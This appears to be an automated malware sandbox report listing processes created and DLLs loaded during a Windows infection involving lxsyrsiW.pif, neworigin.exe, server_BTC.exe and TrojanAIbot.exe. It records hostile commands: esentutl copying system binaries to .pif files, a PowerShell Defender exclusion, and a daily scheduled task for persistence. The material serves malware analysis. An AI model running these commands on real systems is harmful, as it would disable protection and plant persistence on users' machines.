Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: iertutil.dll	Jump to behavior
